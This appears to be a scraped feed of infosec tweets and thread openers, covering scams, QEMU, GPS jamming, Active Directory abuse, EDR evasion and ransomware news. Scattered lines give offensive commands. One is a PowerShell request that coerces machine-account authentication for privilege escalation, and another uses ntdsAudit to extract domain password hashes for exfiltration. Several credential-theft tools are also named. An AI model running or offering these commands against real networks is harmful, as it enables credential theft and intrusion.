Name cannot be blank

@thealexbanks @threadreaderapp unroll

I just fell for one of the best scams I've seen on X. Here's what you need to know (and how to avoid it):

@RetroTechChris @threadreaderapp unroll

It's probably been ten years since I last used the QEMU emulator. I thought to myself, "How hard could it be to get QEMU running with Windows for Workgroups 3.11 with good sound, networking, and video in 2025"? Oh, man... okay, let's talk about it in a 🧵 here.

@elormkdaniel @threadreaderapp unroll

I recently conducted a forensic imaging of a mobile phone using the MVT tool, and the results were fascinating. 📱🔍 I successfully created an exact replica of the device. A complete digital clone of over 32GB of data. But what really stood out was the ability to recover ....

@MehdiHacks @threadreaderapp unroll

🧵 How does an off-the-shelf car GPS jammer work? A short thread. There are many ways to perform radio signal jamming (and also detect or protect against it), however the most basic concept is this: a jammer saturates the input of the target's receiver system by noise, in a way that it can't receive/detect/decode the desired radio signal anymore. It reduces the signal to noise ratio. It's like if you want to listen to someone, but I shout at you in close proximity, so you can't hear that person. (I hope experts don't shout at me for this simplistic example) There are many legal and illegal use cases for a jammer: military, law enforcement, car theft, protection against tracking etc. 1/4

@_bin_Ash @_nwodtuhs @threadreaderapp unroll

In the past year I've seen SO many weird permissions granted to the "Domain Computers" group in environments. Always check outbound control from this group! See below for how to gain "Domain Computers" permissions, for later exploitation (with many links from @_nwodtuhs):

@M4yFly @threadreaderapp unroll

Did you know you didn't need to use a potatoes exploit to going from iis apppool account to admin or system ? Simply use: powershell iwr http://192.168.56.1 -UseDefaultCredentials To get an HTTP coerce of the machine account. 👇🧵

@Laughing_Mantis @threadreaderapp unroll

PSA In the last week I have seen 3 examples of a relatively new strategy targeting telcos & iPhones of victims With the increased measures against SIM Swapping, it seems attackers are switching over to 2 other methods to compromise phones - Call Forwarding - Parental Tools

@embee_research @SEKTOR7net @threadreaderapp unroll

I've been playing around with Module Stomping for EDR Evasion This is a cool technique for bypassing detection by overwriting "legitimate" memory regions. Let's see what it looks like from a #Malware and RE Perspective @SEKTOR7net [1/25]

Hey, @SteveAngello. Big fan. Is there any chance "Sentido" is still alive?

@Infosec_Taylor You're talking about @J0hnnyXm4s's recent tweet ? twitter.com/J0hnnyXm4s/sta…

Oh yay, more SANS hate. The more you try to devalue the cert, the more you are just hurting people who have them... like me... who the only reason I was able to be secure in infosec is with those certs. So, thanks I guess.

That DIT is going to take forever to exfiltrate. Better to strip the hashes out and exfiltrate those instead. github.com/Dionach/NtdsAu… ntdsAudit.exe '.\Active Directory\ntds.dit' -s registry\SYSTEM -p pwddump.txt -u users.csv Its c#, so you can reflectively load it in PS, too.

I really enjoyed testing @C5pider's Havoc C2 framework. Wrote a little blogpost, on how to set it up & exploit a fully patched Win11 machine: payload.cafe/2022/10/02/hav… Video: youtu.be/pso2LAONCJ8

@coro_cyber @joetidy @RoyalMail #AmbulanceChaser

@joetidy not to brag, but we could've stopped that from happening @RoyalMail

Royal Mail ‘cyber incident’ confirmed as ransomware. LockBit or whoever has hacked the company know the damage they are inflicting so I expect ransom to be in the millions. Will Royal Mail pay the hackers?

If you run Kali in VirtualBox, you should prob be familiar with this command to fix clipboard sync: sudo pkill -fx "/usr/bin/VBoxClient --clipboard" && /usr/bin/VBoxClient --clipboard

How to learn reverse engineering fast. A Practical approach. (thread)

With a decade of experience I can tell there are great companies to work for and not. The great ones, allow you to grow, make mistakes, learn from them, be yourself, with all your handicaps, defects and your mastery skills, they care about you on individual level/human level

@yashar6909 @nas_bench Nighthawk.

@nas_bench I must have missed an episode, which c2 framework was leaked?

Me seeing another C2 framework being leaked and abused.

@Alh4zr3d But, Lazagne is a great option too.

@Alh4zr3d Or, you could go Internal-Monologue or Masky (ADCS required) way.

"Tools such as PC Hunter (which grants access to system processes, kernel modes, and hooks), GMER (which detects and removes rootkits) and Revo Uninstaller (which can uninstall apps and programs) also terminate programs and antimalware solutions." 3/4 trendmicro.com/vinfo/us/secur…